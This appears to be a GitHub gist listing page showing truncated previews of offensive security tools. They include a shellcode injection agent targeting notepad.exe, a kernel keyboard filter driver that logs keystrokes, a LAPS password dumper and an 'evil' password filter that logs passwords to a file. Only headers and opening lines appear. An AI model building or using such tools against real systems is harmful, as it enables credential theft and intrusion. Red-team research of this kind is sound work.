Benjamin Heise benheise
benheise
/ AllTheThings.cs
Created
February 11, 2022 16:37
DynWrapit - Arbitrary .NET load Any Assembly from configurable path
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Runtime.InteropServices; | |
| public class Program | |
| { | |
| public static void Main() | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.EnterpriseServices; | |
| using System.Runtime.InteropServices; | |
| public sealed class MyAppDomainManager : AppDomainManager | |
| { | |
| public override void InitializeNewDomain(AppDomainSetup appDomainInfo) | |
| { |
benheise
/ client-ipv6-generic.c
Created
January 24, 2022 02:16
— forked from mhaskar/client-ipv6-generic.c
DNSStager v1.0 beta agent to inject the retrived shellcode in notepad.exe and using Early Bird APC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdint.h> | |
| #include <inttypes.h> | |
| #include <winsock2.h> | |
| #include <windns.h> | |
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <tlhelp32.h> | |
benheise
/ KbdclassFltrDriver.c
Created
December 15, 2021 00:59
— forked from Barakat/KbdclassFltrDriver.c
Kbdclass kernel filter driver to log scan-codes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <wdm.h> | |
| #include <ntddkbd.h> | |
| // | |
| // Per-device object extension | |
| // | |
| typedef struct _DEVICE_EXTENSTION | |
| { | |
| // | |
| // Driver must not be deleted as long as there is a pending IRP |
benheise
/ laps.py
Created
August 6, 2021 15:10
— forked from jstnkndy/laps.py
Modified version of https://github.com/n00py/LAPSDumper to allow cross domain targeting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from ldap3 import ALL, Server, Connection, NTLM, extend, SUBTREE | |
| import argparse | |
| parser = argparse.ArgumentParser(description='Dump LAPS Passwords') | |
| parser.add_argument('-u','--username', help='username for LDAP', required=True) | |
| parser.add_argument('-p','--password', help='password for LDAP (or LM:NT hash)',required=True) | |
| parser.add_argument('-l','--ldapserver', help='LDAP server (or domain)', required=False) | |
| parser.add_argument('-d','--domain', help='Domain', required=True) | |
| parser.add_argument('-t', '--target', help="Target Domain", required=False) |
benheise
/ evilpassfilter.cpp
Created
February 11, 2017 16:31
— forked from mubix/evilpassfilter.cpp
Evil "Password Filter"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #include <WinInet.h> | |
| #include <ntsecapi.h> | |
| void writeToLog(const char* szString) | |
| { | |
| FILE* pFile = fopen("c:\\windows\\temp\\logFile.txt", "a+"); | |
| if (NULL == pFile) | |
| { |
NewerOlder